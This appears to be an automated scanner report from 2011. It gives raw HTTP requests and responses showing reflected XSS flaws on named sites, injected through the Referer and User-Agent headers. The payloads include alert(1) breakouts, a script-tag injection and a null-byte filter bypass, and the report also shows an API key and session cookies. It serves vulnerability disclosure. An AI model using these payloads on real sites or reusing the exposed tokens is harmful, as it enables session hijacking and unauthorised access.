HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:16 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:16 GMT Connection: close Content-Length: 31563
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "d5395";alert(1)//8cf555a3bfa"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a44e'%3balert(1)//5f700a46bff was submitted in the Referer HTTP header. This input was echoed as 1a44e';alert(1)//5f700a46bff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-mortgage-lender.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=1a44e'%3balert(1)//5f700a46bff
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:58 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:35:57 GMT Connection: close Content-Length: 34659
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dacf1"%3balert(1)//155dee88ae4 was submitted in the Referer HTTP header. This input was echoed as dacf1";alert(1)//155dee88ae4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-mortgage-lender.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=dacf1"%3balert(1)//155dee88ae4
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:57 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:35:56 GMT Connection: close Content-Length: 34659
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "dacf1";alert(1)//155dee88ae4"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2ffb'%3balert(1)//2017b493094 was submitted in the Referer HTTP header. This input was echoed as c2ffb';alert(1)//2017b493094 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-mortgage.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=c2ffb'%3balert(1)//2017b493094
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:07 GMT Connection: close Content-Length: 85378
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6163"%3balert(1)//498765472fb was submitted in the Referer HTTP header. This input was echoed as d6163";alert(1)//498765472fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-mortgage.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=d6163"%3balert(1)//498765472fb
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:07 GMT Connection: close Content-Length: 85378
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "d6163";alert(1)//498765472fb"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0800"%3balert(1)//0d9e6834871 was submitted in the Referer HTTP header. This input was echoed as d0800";alert(1)//0d9e6834871 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-an-online-checking-account.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=d0800"%3balert(1)//0d9e6834871
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:13 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:13 GMT Connection: close Content-Length: 33683
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "d0800";alert(1)//0d9e6834871"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aaeae'%3balert(1)//9e376e61a79 was submitted in the Referer HTTP header. This input was echoed as aaeae';alert(1)//9e376e61a79 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-an-online-checking-account.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=aaeae'%3balert(1)//9e376e61a79
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:14 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:14 GMT Connection: close Content-Length: 33683
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71c11'%3balert(1)//0c64a2d8a24 was submitted in the Referer HTTP header. This input was echoed as 71c11';alert(1)//0c64a2d8a24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=71c11'%3balert(1)//0c64a2d8a24
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:07 GMT Connection: close Content-Length: 46266
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11ee8"%3balert(1)//0fd04f86b98 was submitted in the Referer HTTP header. This input was echoed as 11ee8";alert(1)//0fd04f86b98 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=11ee8"%3balert(1)//0fd04f86b98
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:07 GMT Connection: close Content-Length: 46266
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "11ee8";alert(1)//0fd04f86b98"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aeb3b"%3balert(1)//3f4b39407ec was submitted in the Referer HTTP header. This input was echoed as aeb3b";alert(1)//3f4b39407ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=aeb3b"%3balert(1)//3f4b39407ec
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:09 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:09 GMT Connection: close Content-Length: 31063
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "aeb3b";alert(1)//3f4b39407ec"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2399d'%3balert(1)//1fd21ed3d2 was submitted in the Referer HTTP header. This input was echoed as 2399d';alert(1)//1fd21ed3d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=2399d'%3balert(1)//1fd21ed3d2
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:09 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:09 GMT Connection: close Content-Length: 31061
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95b18'%3balert(1)//6e16c45e18f was submitted in the Referer HTTP header. This input was echoed as 95b18';alert(1)//6e16c45e18f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /questions/ask HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=95b18'%3balert(1)//6e16c45e18f
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Expires: Thu, 03 Feb 2011 16:35:53 GMT Server: Microsoft-IIS/7.5 Set-Cookie: ASP.NET_SessionId=cijh1055dy4tss55r0fkks45; path=/; HttpOnly X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=cijh1055dy4tss55r0fkks45; path=/; HttpOnly Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:53 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:35:53 GMT Connection: close Content-Length: 11928
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93a1d'%3balert(1)//1261bf759ea was submitted in the Referer HTTP header. This input was echoed as 93a1d';alert(1)//1261bf759ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /questions/filter/bank HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=93a1d'%3balert(1)//1261bf759ea
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:55 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:35:54 GMT Connection: close Content-Length: 49014
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60377</script><script>alert(1)</script>5e2b578442b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:14:04 GMT Content-Type: text/html;charset=UTF-8 Connection: close Cache-Control: private Content-Length: 20813
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=60377</script><script>alert(1)</script>5e2b578442b"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3575c"-alert(1)-"7068f2207e8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif HTTP/1.1 Host: www.supermedia.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=3575c"-alert(1)-"7068f2207e8 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; mbox=check#true#1296759589|session#1296759528614-838261#1296761389
Response (redirected)
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:13:57 GMT Content-Type: text/html;charset=UTF-8 Connection: close Cache-Control: private Content-Length: 20791
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=3575c"-alert(1)-"7068f2207e8"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00ba07d"-alert(1)-"85da7928a00 was submitted in the Referer HTTP header. This input was echoed as ba07d"-alert(1)-"85da7928a00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:13:59 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Language: en-US Connection: close Content-Length: 24677
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="%00ba07d"-alert(1)-"85da7928a00"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af436"-alert(1)-"c8d45d1ae80 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
